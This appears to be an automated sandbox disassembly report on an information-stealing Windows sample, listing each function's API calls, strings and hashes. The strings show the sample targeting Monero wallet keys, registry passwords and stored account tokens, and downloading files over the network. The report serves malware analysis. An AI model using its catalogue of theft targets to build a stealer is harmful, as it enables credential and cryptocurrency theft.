Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401425

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
Part of subcall function 004093A0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A

DeleteFileA.KERNEL32(00000000), ref: 004014A9
memset.MSVCRT ref: 004014D0

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,00CE3038), ref: 00404ED9

Strings

\Monero\wallet.keys, xrefs: 0040134D
wallet_path, xrefs: 004012F0
.keys, xrefs: 0040132B
SOFTWARE\monero-project\monero-core, xrefs: 004012F5

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$lstrcat$lstrlen$AllocCloseHeapLocalOpenmemset$ChangeCopyCreateDeleteFindFreeInternetNotificationProcessQueryReadSizeSystemTimeValue
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
API String ID: 2054947926-218353709
Opcode ID: 22448f091a5c933627053f5371e803157e940ba91bf056165aa0acb93e0a330c
Instruction ID: 465d6e3be360dc7981781b6de12631b9db2cd28431e3bfe2701297f35846b4c8
Opcode Fuzzy Hash: 22448f091a5c933627053f5371e803157e940ba91bf056165aa0acb93e0a330c
Instruction Fuzzy Hash: DD5123B195021897CB15EB61DD92BED773D9F54304F4041EDB60A62091DE385BC5CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00406FA0 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 91stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406CA0: memset.MSVCRT ref: 00406CE4
Part of subcall function 00406CA0: RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 00406D0A
Part of subcall function 00406CA0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00406D81
Part of subcall function 00406CA0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00406DDD
Part of subcall function 00406CA0: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E22
Part of subcall function 00406CA0: HeapFree.KERNEL32(00000000,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E29

lstrcat.KERNEL32(2D575020,0041DEB8), ref: 00406FD6
lstrcat.KERNEL32(2D575020,00000000), ref: 00407018
lstrcat.KERNEL32(2D575020, : ), ref: 0040702A
lstrcat.KERNEL32(2D575020,00000000), ref: 0040705F
lstrcat.KERNEL32(2D575020,0041DEC0), ref: 00407070
lstrcat.KERNEL32(2D575020,00000000), ref: 004070A3
lstrcat.KERNEL32(2D575020,0041DEC4), ref: 004070BD
task.LIBCPMTD ref: 004070CB

Strings

h0A, xrefs: 00406FA6, 00406FA9
: , xrefs: 0040701E
`v@, xrefs: 00406FAF, 004070C8, 00406FFE, 00407034, 0040707C, 00407045, 00406FB2

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
String ID: : $`v@$h0A
API String ID: 3191641157-3559972273
Opcode ID: 22c65c759e4008ac886b6aeda8a47d70719bcccf3909e077351c77a1654b374d
Instruction ID: d9fe8ddf8edd41d5d79e2c2aa3549d60ad86c8a123fe42dd1537da3b5299582f
Opcode Fuzzy Hash: 22c65c759e4008ac886b6aeda8a47d70719bcccf3909e077351c77a1654b374d
Instruction Fuzzy Hash: 4B318371E05504ABCB14EBA0DD99EFF7B75BF44305B104519F102BB290DA38BD46CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00415710 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

image/jpeg, xrefs: 00415836

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID:
String ID: image/jpeg
API String ID: 0-3785015651
Opcode ID: 823e24224ad0795bf92f39a1a1d9768050a1fa97faa6aea9743e301ac837d475
Instruction ID: 4e1e11a2c406ea1305e74ab4ef0d66e5904d243d4ada77d8c1e4b1ca7303bf9d
Opcode Fuzzy Hash: 823e24224ad0795bf92f39a1a1d9768050a1fa97faa6aea9743e301ac837d475
Instruction Fuzzy Hash: 30714CB5910608EBDB14EFE4EC85FEEB7B9BF48300F108509F515A7290DB38A945CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00406CA0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00406CE4
RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 00406D0A
RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00406D81
StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00406DDD
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E22
HeapFree.KERNEL32(00000000,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E29

Part of subcall function 00408C20: vsprintf_s.MSVCRT ref: 00408C3B

task.LIBCPMTD ref: 00406F25

Strings

Password, xrefs: 00406DD1

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
String ID: Password
API String ID: 2698061284-3434357891
Opcode ID: e5b433d59e683e3853dabaec4553a197e9f76ed1b5df22dde85a26ca8bf12c56
Instruction ID: 212e66a44237aadac39c144ffd634e87161c2b2b5cb707631054264fe3c499ea
Opcode Fuzzy Hash: e5b433d59e683e3853dabaec4553a197e9f76ed1b5df22dde85a26ca8bf12c56
Instruction Fuzzy Hash: 4F613FB5D042589BDB24DB50CC45BDAB7B8BF44304F0081EAE64AA6281DF746FC9CF95

Uniqueness

Uniqueness Score: -1.00%

Function 004141C0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004141DF
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041421C
GetProcessHeap.KERNEL32(00000000,00000104), ref: 004142A0
HeapAlloc.KERNEL32(00000000), ref: 004142A7
wsprintfA.USER32 ref: 004142DD

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Strings

\, xrefs: 004141FD
C, xrefs: 004141E9
:, xrefs: 004141F9

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
String ID: :$C$\
API String ID: 3790021787-3809124531
Opcode ID: 6ca11245975395cfb749b767d31339a8af53aa26318921bdecc0eb4ed934f432
Instruction ID: 52054a8b39965f6583c41ffabf349f0ba0ed2356e3a02770a6039194ee1378f4
Opcode Fuzzy Hash: 6ca11245975395cfb749b767d31339a8af53aa26318921bdecc0eb4ed934f432
Instruction Fuzzy Hash: BA3194B0D00258EBDF20DFA4DC45BEE77B4AF48304F104099F5496B281DB78AAD5CB95

Uniqueness

Uniqueness Score: -1.00%

Function 004093A0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 82filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
LocalAlloc.KERNEL32(00000040,?), ref: 00409411
ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
LocalFree.KERNEL32('@), ref: 00409470
FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A

Strings

'@, xrefs: 004093C3, 00409486
'@, xrefs: 00409426, 00409449, 00409429, 0040946F

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: File$Local$AllocChangeCloseCreateFindFreeNotificationReadSize
String ID: '@$'@
API String ID: 1815715184-345573653
Opcode ID: 48f4b7413470cb3276c60afe27c6050599c7e1b25b920e3e6a5c65917fe61f9c
Instruction ID: e17ca2bf8fb39da35cf654cfb04ed30359ebe63801e33f8f777122e55a65d6c5
Opcode Fuzzy Hash: 48f4b7413470cb3276c60afe27c6050599c7e1b25b920e3e6a5c65917fe61f9c
Instruction Fuzzy Hash: 0B31EA74A00209EFDB24DF94C885BAEB7B5BF48314F108169E915A73D0D778AD42CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00414960 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 50memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,00CE6060,00000000,?,0041D774,00000000,?,00000000,00000000,?,00CE6108), ref: 0041496D
HeapAlloc.KERNEL32(00000000), ref: 00414974
GlobalMemoryStatusEx.KERNEL32(00000040), ref: 00414995
__aulldiv.LIBCMT ref: 004149AF
__aulldiv.LIBCMT ref: 004149BD
wsprintfA.USER32 ref: 004149E9

Strings

@, xrefs: 0041498A
%d MB, xrefs: 004149E0

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
String ID: %d MB$@
API String ID: 2886426298-3474575989
Opcode ID: f62cb7ad2578be9c21b89e6e1bf921e4f1007482674ad6998ac9b57a816d1492
Instruction ID: f510475f390b20142bb5ad9b480526056b42ea6839ab7368ec165d8bd78ed5c1
Opcode Fuzzy Hash: f62cb7ad2578be9c21b89e6e1bf921e4f1007482674ad6998ac9b57a816d1492
Instruction Fuzzy Hash: 84111EB0D40208ABDB10DFE4CC49FAE77B8BB48704F104549F715BB284D7B8A9418B99

Uniqueness

Uniqueness Score: -1.00%

Function 00405D40 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506

InternetOpenA.WININET(0041D7D3,00000001,00000000,00000000,00000000), ref: 00405DAF
StrCmpCA.SHLWAPI(?,00CE3038), ref: 00405DE7
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00405E2F
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00405E53
InternetReadFile.WININET(00410E73,?,00000400,?), ref: 00405E7C
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00405EAA
FindCloseChangeNotification.KERNEL32(?,?,00000400), ref: 00405EE9
InternetCloseHandle.WININET(00410E73), ref: 00405EF3
InternetCloseHandle.WININET(00000000), ref: 00405F00

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: Internet$CloseFile$HandleOpen$ChangeCrackCreateFindNotificationReadWritelstrcpylstrlen
String ID:
API String ID: 729276229-0
Opcode ID: 8d9a3180b18a5efc90efd9d912cec60318239b29a62a7d3eda4b771ff523c89c
Instruction ID: 46018c2d0393d599e49b8942d3c4f4431f3cc1562104312217daf3d911a1fc92
Opcode Fuzzy Hash: 8d9a3180b18a5efc90efd9d912cec60318239b29a62a7d3eda4b771ff523c89c
Instruction Fuzzy Hash: DB514471A00618ABDB20DF51CC45BEF7779EB44305F1081AAB645B71C0DB78AB85CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00413D90 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT ref: 00413D9E

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

OpenProcess.KERNEL32(001FFFFF,00000000,00413FCD,0041D28B), ref: 00413DDC
memset.MSVCRT ref: 00413E2A
??_V@YAXPAX@Z.MSVCRT ref: 00413F7E

Strings

65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00413E4C

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: OpenProcesslstrcpymemset
String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
API String ID: 224852652-4138519520
Opcode ID: 136f340d3def94dd6f6bc6e7af2fbddae3deb45c6c7debbe56f20a408c524ea1
Instruction ID: ba4a912f34a6ab240f03399ec897c117189ceb9282cc0eaf369c81769a73d46f
Opcode Fuzzy Hash: 136f340d3def94dd6f6bc6e7af2fbddae3deb45c6c7debbe56f20a408c524ea1
Instruction Fuzzy Hash: 35513DB0D003189BDB24EF51DC45BEEBB75AB48309F5041AEE11966281DB386BC9CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0040B250 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 274stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E

lstrlen.KERNEL32(00000000), ref: 0040B44D

Part of subcall function 00415530: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552

StrStrA.SHLWAPI(00000000,AccountId), ref: 0040B47B
lstrlen.KERNEL32(00000000), ref: 0040B553
lstrlen.KERNEL32(00000000), ref: 0040B567

Strings

SELECT service, encrypted_token FROM token_service, xrefs: 0040B3BB
AccountTokens, xrefs: 0040B28A
AccountTokens, xrefs: 0040B319
AccountId, xrefs: 0040B472

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$AllocLocallstrcat$memcmpmemset
String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
API String ID: 2910778473-1079375795
Opcode ID: d4a8957ebbbd78759d3f93dd6f3b1506ddab44582e308021b3a82acc02ea6c7b
Instruction ID: df2f8e8a8ca21c55da42a3c6f19f5118b3684059388f817d0631ea5bb79e5354
Opcode Fuzzy Hash: d4a8957ebbbd78759d3f93dd6f3b1506ddab44582e308021b3a82acc02ea6c7b
Instruction Fuzzy Hash: 07A164759102089BCF14FBA1DC52EEE7739BF54308F51416EF506B2191EF38AA85CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 658BC930 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 658BC947
VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 658BC969
GetSystemInfo.KERNEL32(?), ref: 658BC9A9
VirtualFree.KERNEL32(00000000,?,00008000), ref: 658BC9C8
VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 658BC9E2

Strings

O'/, xrefs: 658BC939

Memory Dump Source

Source File: 0000000C.00000002.2644690067.00000000658A1000.00000020.00000001.01000000.00000027.sdmp, Offset: 658A0000, based on PE: true

Associated: 0000000C.00000002.2643997678.00000000658A0000.00000002.00000001.01000000.00000027.sdmpDownload File
Associated: 0000000C.00000002.2646142538.000000006591D000.00000002.00000001.01000000.00000027.sdmpDownload File
Associated: 0000000C.00000002.2646561764.000000006592E000.00000004.00000001.01000000.00000027.sdmpDownload File
Associated: 0000000C.00000002.2647031877.0000000065932000.00000002.00000001.01000000.00000027.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_658a0000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Similarity

API ID: Virtual$AllocInfoSystem$Free
String ID: O'/
API String ID: 4191843772-3288639832
Opcode ID: 391c8742f9f726027501cfc0f13eec9de95132eec8ef02bbe8641576708676a9
Instruction ID: 9bc8587f39c61012221d1cec8c5831f5f5ffab06166c2bfe8b41d70f9810dca6
Opcode Fuzzy Hash: 391c8742f9f726027501cfc0f13eec9de95132eec8ef02bbe8641576708676a9
Instruction Fuzzy Hash: 4A21FC327692196BEB149E68CC84BAE77FDBB46704F50091EF902A7741DF705C00C792

Uniqueness

Uniqueness Score: -1.00%

Function 00414B79 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59registrystringCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414BC3
wsprintfA.USER32 ref: 00414BF6
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00414C18
RegCloseKey.ADVAPI32(00000000), ref: 00414C29
RegCloseKey.ADVAPI32(00000000), ref: 00414C36

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

RegQueryValueExA.KERNEL32(00000000,00CE6558,00000000,000F003F,?,00000400), ref: 00414C89
lstrlen.KERNEL32(?), ref: 00414C9E
RegQueryValueExA.KERNEL32(00000000,00CE6498,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,0041D4B4), ref: 00414D36
RegCloseKey.KERNEL32(00000000), ref: 00414DA5
RegCloseKey.ADVAPI32(00000000), ref: 00414DB7

Strings

%s\%s, xrefs: 00414BEA

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
String ID: %s\%s
API String ID: 3896182533-4073750446
Opcode ID: 49bd180f3d19f789d073d9977c9b899b153d1fd3672ba65f9cf7a2d2756c86b8
Instruction ID: d244d91c33a18a5b0a6d9a0a642cdc181f43283702d6765b4fd500d7f5e12fa2
Opcode Fuzzy Hash: 49bd180f3d19f789d073d9977c9b899b153d1fd3672ba65f9cf7a2d2756c86b8
Instruction Fuzzy Hash: 59213875A0021CABDB64CB50DC85FE973B9BF88300F0085D9A649A6180DF74AAC6CFE4

Uniqueness

Uniqueness Score: -1.00%

Function 00411D80 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00411DA5
RegOpenKeyExA.KERNEL32(80000001,00CE67A8,00000000,00020119,?), ref: 00411DC4
RegQueryValueExA.ADVAPI32(?,00CE7D00,00000000,00000000,00000000,000000FF), ref: 00411DE8
RegCloseKey.ADVAPI32(?), ref: 00411DF2
lstrcat.KERNEL32(?,00000000), ref: 00411E17
lstrcat.KERNEL32(?,00CE7F40), ref: 00411E2B

Memory Dump Source

Source File: 0000000C.00000002.2507015806.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.2507015806.0000000000448000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.000000000044B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.2507015806.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_D5ft_dAZwUuL52qmUM1rPffT.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseOpenQueryValuememset
String ID:
API String ID: 2623679115-0
Opcode ID: 4ec87cb28691ded8ab2e8353accbb1fb78d3f5e5ff2873c10d3422ffdcaa2c2d
Instruction ID: 8aed71b150b2ed53c6c52757a29982c6d8c6785b9d22af2673d92710ece34b21
Opcode Fuzzy Hash: 4ec87cb28691ded8ab2e8353accbb1fb78d3f5e5ff2873c10d3422ffdcaa2c2d
Instruction Fuzzy Hash: F641B4B2900108BBCB15EBE0DC86FEE733EAB88745F00454DF71A5A191EE7467848BE1

Uniqueness

Uniqueness Score: -1.00%

Function 00409B30 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 360filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

